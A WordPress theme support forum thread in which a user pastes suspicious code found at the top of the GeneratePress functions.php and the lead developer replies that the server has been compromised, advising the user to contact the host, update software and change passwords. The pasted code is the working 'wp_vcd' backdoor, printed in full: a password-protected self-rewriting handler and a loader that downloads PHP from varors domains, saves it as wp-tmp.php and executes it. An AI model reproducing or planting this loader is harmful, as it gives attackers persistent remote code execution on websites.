[Support request] weird code in functions.php

Home Forums Support [Support request] weird code in functions.php

Popular Articles

Missing style.css

Updating errors

Installing GP Premium

Installing GeneratePress

How to add CSS

How to add PHP

Home Forums Support weird code in functions.php

Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
    Posts
  • February 23, 2019 at 11:28 am #819057
    Nasif

    seeing some weird code from 1st to 184th line in functions.php in my website which I am not seeing in functions.php from original downloaded file:


    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '9fade7397d0710fa1b1b35e4f047467c'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {

    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {

    if (!empty($_REQUEST['newdomain']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    {

    $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }

    }
    }
    }
    break;

    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {

    if (!empty($_REQUEST['newcode']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
    {

    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }

    }
    }
    }
    break;

    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
    }

    $div_code_name = "wp_vcd";
    $funcfile = __FILE__;
    if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

    function file_get_contents_tcurl($url)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }

    function theme_temp_setup($phpCode)
    {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    if( fwrite($handle, "<?php\n" . $phpCode))
    {
    }
    else
    {
    $tmpfname = tempnam('./', "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    }
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    $wp_auth_key='506612fdd5cd54762092c0d136fa0792';
    if (($tmpcontent = @file_get_contents("http://www.varors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.varors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents("http://www.varors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents("http://www.varors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    }

    }
    }

    //$start_wp_theme_tmp

    //wp_tmp

    //$end_wp_theme_tmp
    ?><?php
    /**
    * GeneratePress.
    *
    * Please do not make any edits to this file. All edits should be done in a child theme.
    *
    * @package GeneratePress
    */

    if ( ! defined( 'ABSPATH' ) ) {
    exit; // Exit if accessed directly.
    }

    // Set our theme version.
    define( 'GENERATE_VERSION', '2.2.2' );

    if ( ! function_exists( 'generate_setup' ) ) {
    add_action( 'after_setup_theme', 'generate_setup' );
    /**
    * Sets up theme defaults and registers support for various WordPress features.
    *
    * @since 0.1
    */
    function generate_setup() {
    // Make theme available for translation.
    load_theme_textdomain( 'generatepress' );

    // Add theme support for various features.
    add_theme_support( 'automatic-feed-links' );
    add_theme_support( 'post-thumbnails' );
    add_theme_support( 'post-formats', array( 'aside', 'image', 'video', 'quote', 'link', 'status' ) );
    add_theme_support( 'woocommerce' );
    add_theme_support( 'title-tag' );
    add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption' ) );
    add_theme_support( 'customize-selective-refresh-widgets' );
    add_theme_support( 'align-wide' );
    add_theme_support( 'editor-color-palette', array() );
    add_theme_support( 'responsive-embeds' );

    add_theme_support( 'custom-logo', array(
    'height' => 70,
    'width' => 350,
    'flex-height' => true,
    'flex-width' => true,
    ) );

    // Register primary menu.
    register_nav_menus( array(
    'primary' => __( 'Primary Menu', 'generatepress' ),
    ) );

    /**
    * Set the content width to something large
    * We set a more accurate width in generate_smart_content_width()
    */
    global $content_width;
    if ( ! isset( $content_width ) ) {
    $content_width = 1200; /* pixels */
    }

    // This theme styles the visual editor to resemble the theme style.
    add_editor_style( 'css/admin/editor-style.css' );
    }
    }

    /**
    * Get all necessary theme files
    */
    require get_template_directory() . '/inc/theme-functions.php';
    require get_template_directory() . '/inc/defaults.php';
    require get_template_directory() . '/inc/class-css.php';
    require get_template_directory() . '/inc/css-output.php';
    require get_template_directory() . '/inc/general.php';
    require get_template_directory() . '/inc/customizer.php';
    require get_template_directory() . '/inc/markup.php';
    require get_template_directory() . '/inc/typography.php';
    require get_template_directory() . '/inc/plugin-compat.php';
    require get_template_directory() . '/inc/block-editor.php';
    require get_template_directory() . '/inc/migrate.php';
    require get_template_directory() . '/inc/deprecated.php';

    if ( is_admin() ) {
    require get_template_directory() . '/inc/meta-box.php';
    require get_template_directory() . '/inc/dashboard.php';
    }

    /**
    * Load our theme structure
    */
    require get_template_directory() . '/inc/structure/archives.php';
    require get_template_directory() . '/inc/structure/comments.php';
    require get_template_directory() . '/inc/structure/featured-images.php';
    require get_template_directory() . '/inc/structure/footer.php';
    require get_template_directory() . '/inc/structure/header.php';
    require get_template_directory() . '/inc/structure/navigation.php';
    require get_template_directory() . '/inc/structure/post-meta.php';
    require get_template_directory() . '/inc/structure/sidebars.php';

    What’s all those code and what inserted it? Are these code an attempt to get access to my site? Should I be worried?

    GeneratePress 2.2.2
    GP Premium 1.7.8
    February 23, 2019 at 5:23 pm #819282
    Tom
    Lead Developer
    Lead Developer

    Hi there,

    That looks like your server has already been compromised.

    A few of the many reasons this can happen are:

    1. You’re using outdated plugins, themes or WordPress versions.
    2. You’re using an outdated version of PHP.
    3. You’re using a shared server and another site on the server is hacked.

    The best thing you can do is report this to your hosting. It’s in their best interest to get it cleaned up ASAP.

    Once they do that, you’ll want to change all of your passwords and make sure everything is up to date.

    Documentation: http://docs.generatepress.com/
    Adding CSS: http://docs.generatepress.com/article/adding-css/
    Ongoing Development: https://generatepress.com/ongoing-development

  • Author
    Posts
Viewing 2 posts - 1 through 2 (of 2 total)
  • You must be logged in to reply to this topic.

Start building better websites today.

Go Premium Documentation

GeneratePress

Support

Articles

© 2023 EDGE22 Studios LTD.